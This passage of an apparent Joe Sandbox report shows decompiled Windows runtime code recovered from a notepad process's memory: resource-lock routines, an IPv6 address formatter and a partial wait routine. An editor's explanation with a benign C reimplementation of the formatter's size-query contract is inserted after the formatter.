                                                  																_t66 = E00AE3915(_t96, _t109, _t122, _t128, _t138, __eflags);
                                                  																asm("int3");
                                                  																while(1) {
                                                  																	_t110 = _t66;
                                                  																	__eflags = _t66 - 1;
                                                  																	if(_t66 != 1) {
                                                  																		break;
                                                  																	}
                                                  																	_t128 = _t128 | 0xffffffff;
                                                  																	_t66 = _t110;
                                                  																	asm("lock cmpxchg [ebx], edi");
                                                  																	__eflags = _t66 - _t110;
                                                  																	if(_t66 != _t110) {
                                                  																		continue;
                                                  																	} else {
                                                  																		_t67 =  *[fs:0x18];
                                                  																		 *((intOrPtr*)(_t138 + 0x2c)) =  *((intOrPtr*)(_t67 + 0x24));
                                                  																		return _t67;
                                                  																	}
                                                  																	goto L59;
                                                  																}
                                                  																E00AC5329(_t110, _t138);
                                                  																_t69 = E00AC53A5(_t138, 1);
                                                  																return _t69;
                                                  															}
                                                  														}
                                                  													}
                                                  												}
                                                  											} else {
                                                  												_t56 =  *(_t96 + 0x28);
                                                  												goto L3;
                                                  											}
                                                  										} else {
                                                  											_t107 =  *_t119;
                                                  											__eflags = _t107;
                                                  											if(__eflags > 0) {
                                                  												while(1) {
                                                  													_t81 = _t107;
                                                  													asm("lock cmpxchg [edi], esi");
                                                  													__eflags = _t81 - _t107;
                                                  													if(_t81 == _t107) {
                                                  														break;
                                                  													}
                                                  													_t107 = _t81;
                                                  													__eflags = _t81;
                                                  													if(_t81 > 0) {
                                                  														continue;
                                                  													}
                                                  													break;
                                                  												}
                                                  												_t56 = _a4;
                                                  												__eflags = _t107;
                                                  											}
                                                  											if(__eflags != 0) {
                                                  												while(1) {
                                                  													L3:
                                                  													__eflags = _t56;
                                                  													if(_t56 != 0) {
                                                  														goto L32;
                                                  													}
                                                  													_t107 = _t107 | 0xffffffff;
                                                  													_t56 = 0;
                                                  													asm("lock cmpxchg [edx], ecx");
                                                  													__eflags = 0;
                                                  													if(0 != 0) {
                                                  														continue;
                                                  													} else {
                                                  														 *((intOrPtr*)(_t96 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
                                                  														return 1;
                                                  													}
                                                  													goto L59;
                                                  												}
                                                  												continue;
                                                  											} else {
                                                  												goto L40;
                                                  											}
                                                  										}
                                                  										goto L59;
                                                  									}
                                                  									__eflags = 0;
                                                  									return 0;
                                                  								} else {
                                                  									_t115 =  *(_t96 + 0x28);
                                                  									continue;
                                                  								}
                                                  							} else {
                                                  								_t106 =  *_t49;
                                                  								__eflags = _t106;
                                                  								if(__eflags > 0) {
                                                  									while(1) {
                                                  										_t93 = _t106;
                                                  										asm("lock cmpxchg [edi], esi");
                                                  										__eflags = _t93 - _t106;
                                                  										if(_t93 == _t106) {
                                                  											break;
                                                  										}
                                                  										_t106 = _t93;
                                                  										__eflags = _t93;
                                                  										if(_t93 > 0) {
                                                  											continue;
                                                  										}
                                                  										break;
                                                  									}
                                                  									__eflags = _t106;
                                                  								}
                                                  								if(__eflags != 0) {
                                                  									continue;
                                                  								} else {
                                                  									goto L23;
                                                  								}
                                                  							}
                                                  						}
                                                  						goto L59;
                                                  					}
                                                  					_t84 = _t115;
                                                  					asm("lock cmpxchg [esi], ecx");
                                                  					__eflags = _t84 - _t115;
                                                  					if(_t84 != _t115) {
                                                  						_t115 = _t84;
                                                  						goto L7;
                                                  					} else {
                                                  						return 1;
                                                  					}
                                                  				}
                                                  				L59:
                                                  			}

                                                  APIs
                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00B02206
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.1044571883.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A80000, based on PE: true
• Associated: 00000009.00000002.1044557902.0000000000A80000.00000040.00000800.00020000.00000000.sdmp
• Associated: 00000009.00000002.1045598601.0000000000B70000.00000040.00000800.00020000.00000000.sdmp
• Associated: 00000009.00000002.1045620887.0000000000B80000.00000040.00000800.00020000.00000000.sdmp
• Associated: 00000009.00000002.1045707273.0000000000B84000.00000040.00000800.00020000.00000000.sdmp
• Associated: 00000009.00000002.1045725616.0000000000B87000.00000040.00000800.00020000.00000000.sdmp
• Associated: 00000009.00000002.1045738115.0000000000B90000.00000040.00000800.00020000.00000000.sdmp
• Associated: 00000009.00000002.1046306994.0000000000BF0000.00000040.00000800.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_a80000_notepad.jbxd
                                                  Similarity
                                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                  • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                  • API String ID: 885266447-4236105082
                                                  • Opcode ID: 423e6f431d687c7c9d616be22b2a4422cc303c9c2aac6e05133ac0568b5de145
                                                  • Instruction ID: 544a4fdd3120c5e4ae2434e45f8bb8a2bbf85b607386c36bea170aa5a6d7ba88
                                                  • Opcode Fuzzy Hash: 423e6f431d687c7c9d616be22b2a4422cc303c9c2aac6e05133ac0568b5de145
                                                  • Instruction Fuzzy Hash: 63514931B002416FEB158B59CC86F6637E9EF98720F2182A9FD45EF2C5DA71EC458790
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 64%
                                                  			E00AE14C0(void* __ecx, void* __edx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr* _a20) {
                                                  				signed int _v8;
                                                  				char _v10;
                                                  				char _v140;
                                                  				void* __ebx;
                                                  				void* __edi;
                                                  				void* __esi;
                                                  				signed int _t24;
                                                  				void* _t26;
                                                  				signed int _t29;
                                                  				signed int _t34;
                                                  				signed int _t40;
                                                  				intOrPtr _t45;
                                                  				void* _t51;
                                                  				intOrPtr* _t52;
                                                  				void* _t54;
                                                  				signed int _t57;
                                                  				void* _t58;
                                                  
                                                  				_t51 = __edx;
                                                  				_t24 =  *0xb82088; // 0x7587b8fb
                                                  				_v8 = _t24 ^ _t57;
                                                  				_t45 = _a16;
                                                  				_t53 = _a4;
                                                  				_t52 = _a20;
                                                  				if(_a4 == 0 || _t52 == 0) {
                                                  					L10:
                                                  					_t26 = 0xc000000d;
                                                  				} else {
                                                  					if(_t45 == 0) {
                                                  						if( *_t52 == _t45) {
                                                  							goto L3;
                                                  						} else {
                                                  							goto L10;
                                                  						}
                                                  					} else {
                                                  						L3:
                                                  						_t28 =  &_v140;
                                                  						if(_a12 != 0) {
                                                  							_push("[");
                                                  							_push(0x41);
                                                  							_push( &_v140);
                                                  							_t29 = E00AD7707();
                                                  							_t58 = _t58 + 0xc;
                                                  							_t28 = _t57 + _t29 * 2 - 0x88;
                                                  						}
                                                  						_t54 = E00AE13CB(_t53, _t28);
                                                  						if(_a8 != 0) {
                                                  							_t34 = E00AD7707(_t54,  &_v10 - _t54 >> 1, L"%%%u", _a8);
                                                  							_t58 = _t58 + 0x10;
                                                  							_t54 = _t54 + _t34 * 2;
                                                  						}
                                                  						if(_a12 != 0) {
                                                  							_t40 = E00AD7707(_t54,  &_v10 - _t54 >> 1, L"]:%u", _a12 & 0x0000ffff);
                                                  							_t58 = _t58 + 0x10;
                                                  							_t54 = _t54 + _t40 * 2;
                                                  						}
                                                  						_t53 = (_t54 -  &_v140 >> 1) + 1;
                                                  						 *_t52 = _t53;
                                                  						if( *_t52 < _t53) {
                                                  							goto L10;
                                                  						} else {
                                                  							E00AA2340(_t45,  &_v140, _t53 + _t53);
                                                  							_t26 = 0;
                                                  						}
                                                  					}
                                                  				}
                                                  				return E00AAE1B4(_t26, _t45, _v8 ^ _t57, _t51, _t52, _t53);
			}

(Address column of the side-by-side listing, flattened by extraction: the instructions of this function sit at 0x00ae14c0 to 0x00ae1559 and at 0x00b0ea0f to 0x00b0ea58.)

                                                  APIs
                                                  • ___swprintf_l.LIBCMT ref: 00B0EA22
                                                    • Part of subcall function 00AE13CB: ___swprintf_l.LIBCMT ref: 00AE146B
                                                    • Part of subcall function 00AE13CB: ___swprintf_l.LIBCMT ref: 00AE1490
                                                  • ___swprintf_l.LIBCMT ref: 00AE156D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.1044571883.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A80000, based on PE: true
                                                   • Associated: 00000009.00000002.1044557902.0000000000A80000.00000040.00000800.00020000.00000000.sdmp
                                                   • Associated: 00000009.00000002.1045598601.0000000000B70000.00000040.00000800.00020000.00000000.sdmp
                                                   • Associated: 00000009.00000002.1045620887.0000000000B80000.00000040.00000800.00020000.00000000.sdmp
                                                   • Associated: 00000009.00000002.1045707273.0000000000B84000.00000040.00000800.00020000.00000000.sdmp
                                                   • Associated: 00000009.00000002.1045725616.0000000000B87000.00000040.00000800.00020000.00000000.sdmp
                                                   • Associated: 00000009.00000002.1045738115.0000000000B90000.00000040.00000800.00020000.00000000.sdmp
                                                   • Associated: 00000009.00000002.1046306994.0000000000BF0000.00000040.00000800.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_a80000_notepad.jbxd
                                                  Similarity
                                                  • API ID: ___swprintf_l
                                                  • String ID: %%%u$]:%u
                                                  • API String ID: 48624451-3050659472
                                                  • Opcode ID: 446590d734c4446de97a95334fcb83ccce65081b3557761c97753ff74727479e
                                                  • Instruction ID: 88569a7fb7bf9717da4339fd2b833c891afc8aeb4115f4bff532e9d4b77f3c87
                                                  • Opcode Fuzzy Hash: 446590d734c4446de97a95334fcb83ccce65081b3557761c97753ff74727479e
                                                  • Instruction Fuzzy Hash: 4E218172A00269ABCB20DF59CD41AEF77BCBB54700F544556F946D3280EB70EA588BE1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%
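
The pseudocode above builds a string of the form [address%scope]:port. The "[" prefix and the "]:%u" suffix are emitted only when the port argument (_a12) is non-zero, "%%%u" appends a literal '%' and the scope id (_a8) only when that is non-zero, and the caller's length pointer (_a20) is both checked and updated: 0xc000000d (STATUS_INVALID_PARAMETER) comes back when the address or the length pointer is NULL, when the output pointer (_a16) is NULL but the length is not 0, or when the supplied length is smaller than the required one; otherwise the text is copied into the caller's buffer and 0 is returned. The "* 2" and ">> 1" arithmetic converts between bytes and UTF-16 characters, and 0x41 is the 65-character scratch buffer between _v140 and _v10. The format strings and argument order match ntdll's RtlIpv6AddressToStringExW; that identification is the editor's, not something the report states. The C below is an added example written for this page, not code from the sample, the report or ntdll: it reproduces the same size-query contract with narrow characters. The address formatter format_addr (a stand-in for the unshown subcall E00AE13CB, without "::" compression), the function name addr_to_string_ex and the sample address are assumptions of the example.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define STATUS_SUCCESS           0x00000000u
#define STATUS_INVALID_PARAMETER 0xC000000Du   /* the 0xc000000d returned at L10 in the pseudocode */
#define SCRATCH_CHARS            65            /* the 0x41-character scratch buffer (_v140 .. _v10) */

/* Hypothetical stand-in for the unshown subcall E00AE13CB: writes the 16-byte
 * address as eight colon-separated hex groups. "::" zero-run compression is
 * left out on purpose; the page does not show how the real formatter works.
 * Returns the characters written (no terminator), or -1 on truncation. */
static int format_addr(const uint8_t addr[16], char *out, size_t cap)
{
    int n = 0;
    for (int i = 0; i < 8; i++) {
        unsigned group = ((unsigned)addr[2 * i] << 8) | addr[2 * i + 1];
        size_t left = cap - (size_t)n;
        int w = (i == 0) ? snprintf(out + n, left, "%x", group)
                         : snprintf(out + n, left, ":%x", group);
        if (w < 0 || (size_t)w >= left)
            return -1;
        n += w;
    }
    return n;
}

/* Same argument order as the pseudocode: address (_a4), scope id (_a8),
 * port (_a12), output buffer (_a16), in/out length in characters (_a20).
 * The pseudocode works in UTF-16 (hence "* 2" and ">> 1"); this model uses
 * narrow characters, so the length arithmetic is identical in characters. */
uint32_t addr_to_string_ex(const uint8_t *addr, uint32_t scope, uint16_t port,
                           char *out, uint32_t *out_len)
{
    char scratch[SCRATCH_CHARS];
    int n = 0, w;

    if (addr == NULL || out_len == NULL)          /* _a4 == 0 || _t52 == 0 -> L10 */
        return STATUS_INVALID_PARAMETER;
    if (out == NULL && *out_len != 0)             /* _t45 == 0 is accepted only with *_t52 == 0 */
        return STATUS_INVALID_PARAMETER;

    if (port != 0)                                /* "[" only when a port follows */
        n += snprintf(scratch, sizeof scratch, "[");
    w = format_addr(addr, scratch + n, sizeof scratch - (size_t)n);
    if (w < 0)
        return STATUS_INVALID_PARAMETER;          /* cannot trigger with this formatter; kept for safety */
    n += w;
    if (scope != 0)                               /* "%%%u": a literal '%' then the scope id */
        n += snprintf(scratch + n, sizeof scratch - (size_t)n, "%%%u", (unsigned)scope);
    if (port != 0)                                /* "]:%u" closes the bracket and appends the port */
        n += snprintf(scratch + n, sizeof scratch - (size_t)n, "]:%u", (unsigned)port);

    uint32_t required = (uint32_t)n + 1;          /* (_t54 - &_v140 >> 1) + 1: terminator included */
    uint32_t provided = *out_len;                 /* the caller's value is read before it is overwritten */
    *out_len = required;                          /* always report what is needed */
    if (provided < required)
        return STATUS_INVALID_PARAMETER;          /* buffer too small: size reported, nothing copied */

    memcpy(out, scratch, required);               /* E00AA2340 copies _t53 characters, terminator included */
    return STATUS_SUCCESS;
}

/* Constructed sample input for the demonstration: fe80::1 as 16 raw bytes. */
static const uint8_t sample_addr[16] = { 0xfe, 0x80, 0, 0, 0, 0, 0, 0,
                                         0, 0, 0, 0, 0, 0, 0, 1 };

/* Size query: NULL buffer and length 0 give STATUS_INVALID_PARAMETER plus the required length. */
uint32_t demo_size_query(void)
{
    uint32_t len = 0;
    uint32_t st = addr_to_string_ex(sample_addr, 3, 443, NULL, &len);
    return st == STATUS_INVALID_PARAMETER ? len : 0;
}

/* Full form with scope and port; 1 when text and reported length are as expected. */
int demo_full_format(void)
{
    char buf[64];
    uint32_t len = sizeof buf;
    if (addr_to_string_ex(sample_addr, 3, 443, buf, &len) != STATUS_SUCCESS)
        return 0;
    return strcmp(buf, "[fe80:0:0:0:0:0:0:1%3]:443") == 0 && len == 27;
}

/* Bare address: no bracket, no scope, no port. */
int demo_plain_format(void)
{
    char buf[64];
    uint32_t len = sizeof buf;
    if (addr_to_string_ex(sample_addr, 0, 0, buf, &len) != STATUS_SUCCESS)
        return 0;
    return strcmp(buf, "fe80:0:0:0:0:0:0:1") == 0 && len == 19;
}

/* Every rejection path, including a buffer that is too small. */
int demo_rejects_bad_args(void)
{
    char buf[8];
    uint32_t len = sizeof buf;
    int ok = 1;
    ok &= addr_to_string_ex(NULL, 0, 0, buf, &len) == STATUS_INVALID_PARAMETER;         /* no address */
    ok &= addr_to_string_ex(sample_addr, 0, 0, buf, NULL) == STATUS_INVALID_PARAMETER;  /* no length */
    ok &= addr_to_string_ex(sample_addr, 0, 0, NULL, &len) == STATUS_INVALID_PARAMETER; /* NULL out, len != 0 */
    ok &= addr_to_string_ex(sample_addr, 0, 0, buf, &len) == STATUS_INVALID_PARAMETER;  /* 8 < 19 */
    ok &= len == 19;                                                                    /* size still reported */
    return ok;
}
```

The practical point for a caller is the size-query protocol: a first call with a NULL buffer and a zero length fails with STATUS_INVALID_PARAMETER but leaves the required character count in the length argument, and a buffer that is too small fails the same way without being written. Code that ignores the status and reads the buffer after a failed call will consume uninitialised memory, which is the error the contract is designed to make detectable.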

                                                  C-Code - Quality: 45%
                                                  			E00AC53A5(signed int _a4, char _a8) {
                                                  				void* __ebx;
                                                  				void* __edi;
                                                  				void* __esi;
                                                  				signed int _t32;
                                                  				signed int _t37;
                                                  				signed int _t40;
                                                  				signed int _t42;
                                                  				void* _t45;
                                                  				intOrPtr _t46;
                                                  				void* _t48;
                                                  				signed int _t49;
                                                  				void* _t51;
                                                  				signed int _t57;
                                                  				signed int _t64;
                                                  				signed int _t71;
                                                  				void* _t74;
                                                  				intOrPtr _t78;
                                                  				signed int* _t79;
                                                  				void* _t85;
                                                  				signed int _t86;
                                                  				signed int _t92;
                                                  				void* _t104;
                                                  				void* _t105;
                                                  
                                                  				_t64 = _a4;
                                                  				_t32 =  *(_t64 + 0x28);
                                                  				_t71 = _t64 + 0x28;
                                                  				_push(_t92);
                                                  				if(_t32 < 0) {
                                                  					_t78 =  *[fs:0x18];
                                                  					__eflags =  *((intOrPtr*)(_t64 + 0x2c)) -  *((intOrPtr*)(_t78 + 0x24));
                                                  					if( *((intOrPtr*)(_t64 + 0x2c)) !=  *((intOrPtr*)(_t78 + 0x24))) {
                                                  						goto L3;
                                                  					} else {
                                                  						__eflags = _t32 | 0xffffffff;
                                                  						asm("lock xadd [ecx], eax");
                                                  						return 1;
                                                  					}
                                                  				} else {
                                                  					L3:
                                                  					_push(_t86);
                                                  					while(1) {
                                                  						L4:
                                                  						__eflags = _t32;
                                                  						if(_t32 == 0) {
                                                  							break;
                                                  						}
                                                  						__eflags = _a8;
                                                  						if(_a8 == 0) {
                                                  							__eflags = 0;
                                                  							return 0;
                                                  						} else {
                                                  							 *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) + 1;
                                                  							_t79 = _t64 + 0x24;
                                                  							_t71 = 1;
                                                  							asm("lock xadd [eax], ecx");
                                                  							_t32 =  *(_t64 + 0x28);
                                                  							_a4 = _t32;
                                                  							__eflags = _t32;
                                                  							if(_t32 != 0) {
                                                  								L19:
                                                  								_t86 = 0;
                                                  								__eflags = 0;
                                                  								while(1) {
                                                  									_t81 =  *(_t64 + 0x30) & 0x00000001;
                                                  									asm("sbb esi, esi");
                                                  									_t92 =  !( ~( *(_t64 + 0x30) & 1)) & 0x00b801c0;
                                                  									_push(_t92);
                                                  									_push(0);
                                                  									_t37 = E00A9F8CC( *((intOrPtr*)(_t64 + 0x20)));
                                                  									__eflags = _t37 - 0x102;
                                                  									if(_t37 != 0x102) {
                                                  										break;
                                                  									}
                                                  									_t71 =  *(_t92 + 4);
                                                  									_t85 =  *_t92;
                                                  									_t51 = E00AE4FC0(_t85, _t71, 0xff676980, 0xffffffff);
                                                  									_push(_t85);
                                                  									_push(_t51);
                                                  									E00AF3F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t86);
                                                  									E00AF3F92(0x65, 0, "RTL: Resource at %p\n", _t64);
                                                  									_t86 = _t86 + 1;
                                                  									_t105 = _t104 + 0x28;
                                                  									__eflags = _t86 - 2;
                                                  									if(__eflags > 0) {
                                                  										E00B2217A(_t71, __eflags, _t64);
                                                  									}
                                                  									_push("RTL: Re-Waiting\n");
                                                  									_push(0);
                                                  									_push(0x65);
                                                  									E00AF3F92();
                                                  									_t104 = _t105 + 0xc;
                                                  								}
                                                  								__eflags = _t37;
                                                  								if(__eflags < 0) {
                                                  									_push(_t37);
                                                  									E00AE3915(_t64, _t71, _t81, _t86, _t92, __eflags);
                                                  									asm("int3");
                                                  									_t40 =  *_t71;
                                                  									 *_t71 = 0;
                                                  									__eflags = _t40;
                                                  									if(_t40 == 0) {
                                                  										L1:
                                                  										_t42 = E00AC5384(_t92 + 0x24);
                                                  										if(_t42 != 0) {
                                                  											goto L31;
                                                  										} else {
                                                  											goto L2;
                                                  										}
                                                  									} else {
                                                  										_t83 =  *((intOrPtr*)(_t92 + 0x18));
                                                  										_push( &_a4);
                                                  										_push(_t40);
                                                  										_t49 = E00A9F970( *((intOrPtr*)(_t92 + 0x18)));
                                                  										__eflags = _t49;
                                                  										if(__eflags >= 0) {
                                                  											goto L1;
                                                  										} else {
                                                  											_push(_t49);
                                                  											E00AE3915(_t64,  &_a4, _t83, _t86, _t92, __eflags);
                                                  											L31:
                                                  											_t82 =  *((intOrPtr*)(_t92 + 0x20));
                                                  											_push( &_a4);
                                                  											_push(1);
                                                  											_t42 = E00A9F970( *((intOrPtr*)(_t92 + 0x20)));
                                                  											__eflags = _t42;
                                                  											if(__eflags >= 0) {
                                                  												L2:
                                                  												return _t42;
                                                  											} else {
                                                  												_push(_t42);
                                                  												E00AE3915(_t64,  &_a4, _t82, _t86, _t92, __eflags);
                                                  												_t73 =  *((intOrPtr*)(_t92 + 0x20));
                                                  												_push( &_a4);
                                                  												_push(1);
                                                  												_t42 = E00A9F970( *((intOrPtr*)(_t92 + 0x20)));
                                                  												__eflags = _t42;
                                                  												if(__eflags >= 0) {
                                                  													goto L2;
                                                  												} else {
                                                  													_push(_t42);
                                                  													_t45 = E00AE3915(_t64, _t73, _t82, _t86, _t92, __eflags);
                                                  													asm("int3");
                                                  													while(1) {
                                                  														_t74 = _t45;
                                                  														__eflags = _t45 - 1;
                                                  														if(_t45 != 1) {
                                                  															break;
                                                  														}
                                                  														_t86 = _t86 | 0xffffffff;
                                                  														_t45 = _t74;
                                                  														asm("lock cmpxchg [ebx], edi");
                                                  														__eflags = _t45 - _t74;
                                                  														if(_t45 != _t74) {
                                                  															continue;
                                                  														} else {
                                                  															_t46 =  *[fs:0x18];
                                                  															 *((intOrPtr*)(_t92 + 0x2c)) =  *((intOrPtr*)(_t46 + 0x24));
                                                  															return _t46;
                                                  														}
                                                  														goto L38;
                                                  													}
                                                  													E00AC5329(_t74, _t92);
                                                  													_push(1);
                                                  													_t48 = E00AC53A5(_t92);
                                                  													return _t48;
                                                  												}
                                                  											}
                                                  										}
                                                  									}
                                                  								} else {
                                                  									_t32 =  *(_t64 + 0x28);
                                                  									continue;
                                                  								}
                                                  							} else {
                                                  								_t71 =  *_t79;
                                                  								__eflags = _t71;
                                                  								if(__eflags > 0) {
                                                  									while(1) {
                                                  										_t57 = _t71;
                                                  										asm("lock cmpxchg [edi], esi");
                                                  										__eflags = _t57 - _t71;
                                                  										if(_t57 == _t71) {
                                                  											break;
                                                  										}
                                                  										_t71 = _t57;
                                                  										__eflags = _t57;
                                                  										if(_t57 > 0) {
                                                  											continue;
                                                  										}
                                                  										break;
                                                  									}
                                                  									_t32 = _a4;
                                                  									__eflags = _t71;
                                                  								}
                                                  								if(__eflags != 0) {
                                                  									continue;
                                                  								} else {
                                                  									goto L19;
                                                  								}
                                                  							}
                                                  						}
                                                  						goto L38;
                                                  					}
                                                  					_t71 = _t71 | 0xffffffff;
                                                  					_t32 = 0;
                                                  					asm("lock cmpxchg [edx], ecx");
                                                  					__eflags = 0;
                                                  					if(0 != 0) {
                                                  						goto L4;
                                                  					} else {
                                                  						 *((intOrPtr*)(_t64 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
                                                  						return 1;
                                                  					}
                                                  				}
                                                  				L38:
			}

(Address column of the side-by-side listing, flattened by extraction: the instructions of this function shown here sit at 0x00ac53ab to 0x00ac53c0, 0x00ac5367 to 0x00ac537c, 0x00ae05b6 to 0x00ae05d5, 0x00b02269 to 0x00b023d7 and 0x00af9153 to 0x00af9176.)
                                                  0x00000000
                                                  0x00b0233f
                                                  0x00b02291
                                                  0x00b02291
                                                  0x00b02293
                                                  0x00b02295
                                                  0x00b0229a
                                                  0x00b022a1
                                                  0x00b022a3
                                                  0x00b022a7
                                                  0x00b022a9
                                                  0x00000000
                                                  0x00000000
                                                  0x00b022ab
                                                  0x00b022ad
                                                  0x00b022af
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00b022af
                                                  0x00b022b1
                                                  0x00b022b4
                                                  0x00b022b4
                                                  0x00b022b6
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00b022b6
                                                  0x00b0228f
                                                  0x00000000
                                                  0x00b0226d
                                                  0x00ac53cb
                                                  0x00ac53ce
                                                  0x00ac53d0
                                                  0x00ac53d4
                                                  0x00ac53d6
                                                  0x00000000
                                                  0x00ac53d8
                                                  0x00ac53e3
                                                  0x00ac53ea
                                                  0x00ac53ea
                                                  0x00ac53d6
                                                  0x00000000

                                                  APIs
                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00B022F4
                                                  Strings
                                                  • RTL: Re-Waiting, xrefs: 00B02328
                                                  • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 00B022FC
                                                  • RTL: Resource at %p, xrefs: 00B0230B
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.1044571883.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A80000, based on PE: true
                                                  • Associated: 00000009.00000002.1044557902.0000000000A80000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000009.00000002.1045598601.0000000000B70000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000009.00000002.1045620887.0000000000B80000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000009.00000002.1045707273.0000000000B84000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000009.00000002.1045725616.0000000000B87000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000009.00000002.1045738115.0000000000B90000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000009.00000002.1046306994.0000000000BF0000.00000040.00000800.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_a80000_notepad.jbxd
                                                  Similarity
                                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                  • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                  • API String ID: 885266447-871070163
                                                  • Opcode ID: 8f31ea356988c471f0e30497c02221c6da877ad59a22599b8e8c0b26992df5ad
                                                  • Instruction ID: 895ee2aeaf954110d06a97bf48d679973ad77d44d19683b85b5d85a01c7261ec
                                                  • Opcode Fuzzy Hash: 8f31ea356988c471f0e30497c02221c6da877ad59a22599b8e8c0b26992df5ad
                                                  • Instruction Fuzzy Hash: 01515472A006016BEF119B78CD85FA673E8EF48360F114269FD08DF281EB60EC8587A0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 51%
                                                  			E00ACEC56(void* __ecx, void* __edx, intOrPtr* __edi, intOrPtr _a4, intOrPtr _a8) {
                                                  				intOrPtr _v8;
                                                  				intOrPtr _v12;
                                                  				signed int _v24;
                                                  				intOrPtr* _v28;
                                                  				intOrPtr _v32;
                                                  				signed int _v36;
                                                  				intOrPtr _v40;
                                                  				short _v66;
                                                  				char _v72;
                                                  				void* __esi;
                                                  				intOrPtr _t38;
                                                  				intOrPtr _t39;
                                                  				signed int _t40;
                                                  				intOrPtr _t42;
                                                  				intOrPtr _t43;
                                                  				signed int _t44;
                                                  				void* _t46;
                                                  				intOrPtr _t48;
                                                  				signed int _t49;
                                                  				intOrPtr _t50;
                                                  				intOrPtr _t53;
                                                  				signed char _t67;
                                                  				void* _t72;
                                                  				intOrPtr _t77;
                                                  				intOrPtr* _t80;
                                                  				intOrPtr _t84;
                                                  				intOrPtr* _t85;
                                                  				void* _t91;
                                                  				void* _t92;
                                                  				void* _t93;
                                                  
                                                  				_t80 = __edi;
                                                  				_t75 = __edx;
                                                  				_t70 = __ecx;
                                                  				_t84 = _a4;
                                                  				if( *((intOrPtr*)(_t84 + 0x10)) == 0) {
                                                  					E00ABDA92(__ecx, __edx, __eflags, _t84);
                                                  					_t38 =  *((intOrPtr*)(_t84 + 0x10));
                                                  				}
                                                  				_push(0);
                                                  				__eflags = _t38 - 0xffffffff;
                                                  				if(_t38 == 0xffffffff) {
                                                  					_t39 =  *0xb8793c; // 0x0
                                                  					_push(0);
                                                  					_push(_t84);
                                                  					_t40 = E00AA16C0(_t39);
                                                  				} else {
                                                  					_t40 = E00A9F9D4(_t38);
                                                  				}
                                                  				_pop(_t85);
                                                  				__eflags = _t40;
                                                  				if(__eflags < 0) {
                                                  					_push(_t40);
                                                  					E00AE3915(_t67, _t70, _t75, _t80, _t85, __eflags);
                                                  					asm("int3");
                                                  					while(1) {
                                                  						L21:
                                                  						_t76 =  *[fs:0x18];
                                                  						_t42 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
                                                  						__eflags =  *(_t42 + 0x240) & 0x00000002;
                                                  						if(( *(_t42 + 0x240) & 0x00000002) != 0) {
                                                  							_v36 =  *(_t85 + 0x14) & 0x00ffffff;
                                                  							_v66 = 0x1722;
                                                  							_t71 =  *((intOrPtr*)(_t85 + 0xc));
                                                  							_t76 =  &_v72;
                                                  							_push( &_v72);
                                                  							_v28 = _t85;
                                                  							_v40 =  *((intOrPtr*)(_t85 + 4));
                                                  							_v32 =  *((intOrPtr*)(_t85 + 0xc));
                                                  							_push(0x10);
                                                  							_push(0x20402);
                                                  							E00AA01A4( *0x7ffe0382 & 0x000000ff);
                                                  						}
                                                  						while(1) {
                                                  							_t43 = _v8;
                                                  							_push(_t80);
                                                  							_push(0);
                                                  							__eflags = _t43 - 0xffffffff;
                                                  							if(_t43 == 0xffffffff) {
                                                  								_t71 =  *0xb8793c; // 0x0
                                                  								_push(_t85);
                                                  								_t44 = E00AA1F28(_t71);
                                                  							} else {
                                                  								_t44 = E00A9F8CC(_t43);
                                                  							}
                                                  							__eflags = _t44 - 0x102;
                                                  							if(_t44 != 0x102) {
                                                  								__eflags = _t44;
                                                  								if(__eflags < 0) {
                                                  									_push(_t44);
                                                  									E00AE3915(_t67, _t71, _t76, _t80, _t85, __eflags);
                                                  									asm("int3");
                                                  									E00B22306(_t85);
                                                  									__eflags = _t67 & 0x00000002;
                                                  									if((_t67 & 0x00000002) != 0) {
                                                  										_t7 = _t67 + 2; // 0x4
                                                  										_t72 = _t7;
                                                  										asm("lock cmpxchg [edi], ecx");
                                                  										__eflags = _t67 - _t67;
                                                  										if(_t67 == _t67) {
                                                  											E00ACEC56(_t72, _t76, _t80, _t85);
                                                  										}
                                                  									}
